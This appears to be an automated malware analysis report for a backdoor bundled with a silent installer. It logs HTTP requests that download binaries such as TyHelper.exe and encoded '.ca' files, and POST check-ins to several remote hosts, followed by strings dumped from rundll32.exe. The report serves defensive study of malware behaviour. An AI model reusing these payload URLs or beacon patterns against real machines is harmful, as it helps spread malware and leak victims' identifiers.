GET /?step_id=1_2&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:23 GMT
Content-Type: text/html
Content-Length: 8282
Connection: close
Content-Disposition: attachment; filename="1_2.txt"
<<< skipped >>>
GET /?step_id=1_1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:38 GMT
Content-Type: text/html
Content-Length: 10014
Connection: close
Content-Disposition: attachment; filename="1_1.txt"
<<< skipped >>>
GET /?e=bsp&clsb=1&publisher=55680&country=US&dd=5&cid=767&vn=153&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: bestories.org
Cache-Control: no-cache
Cookie: __cfduid=d6208cc7f1add1143864b04d60cf818e01421556241
HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:44:15 GMT
Content-Type: application/octet-stream
Content-Length: 210912
Connection: keep-alive
Content-Disposition: attachment; filename="wKjUaVakO6heQO.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa822e6ae3c0ed9-EWR
<<< skipped >>>
GET /?step_id=1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:36 GMT
Content-Type: text/html
Content-Length: 28514
Connection: close
Content-Disposition: attachment; filename="1.txt"
<<< skipped >>>
GET /?e=ytr&cht=2&dd=19&clsb=1&publisher=55680&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: bestories.org
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:44:02 GMT
Content-Type: application/octet-stream
Content-Length: 1480430
Connection: keep-alive
Set-Cookie: __cfduid=d6208cc7f1add1143864b04d60cf818e01421556241; expires=Mon, 18-Jan-16 04:44:01 GMT; path=/; domain=.bestories.org; HttpOnly
Content-Disposition: attachment; filename="yNMtlpV56NSC6w.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa822905ef50ed9-EWR
<<< skipped >>>
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.flagmisterlibcontent.net
Content-Length: 3599
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:36 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}
GET /?e=dfd73&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=55680&&&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: masterial.net
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:43:45 GMT
Content-Type: application/octet-stream
Content-Length: 1523454
Connection: keep-alive
Set-Cookie: __cfduid=df7bd18451bc1541b0698dd4c8d03ba811421556225; expires=Mon, 18-Jan-16 04:43:45 GMT; path=/; domain=.masterial.net; HttpOnly
Content-Disposition: attachment; filename="CmPMt7BDxLvtoE.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa8222b16e90ed3-EWR
<<< skipped >>>
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.flagmisterlibcontent.net
Content-Length: 2460
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:20 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}
GET /?step_id=1_1_4&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:10 GMT
Content-Type: text/html
Content-Length: 10646
Connection: close
Content-Disposition: attachment; filename="1_1_4.txt"
<<< skipped >>>
GET /?step_id=1_1_3&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:56 GMT
Content-Type: text/html
Content-Length: 10474
Connection: close
Content-Disposition: attachment; filename="1_1_3.txt"
<<< skipped >>>
GET /TyHelper.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: settlemental.net
Connection: Keep-Alive
<<< skipped >>>
Map
The Backdoor connects to the servers at the following location(s):
Strings from Dumps
rundll32.exe_1324:
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s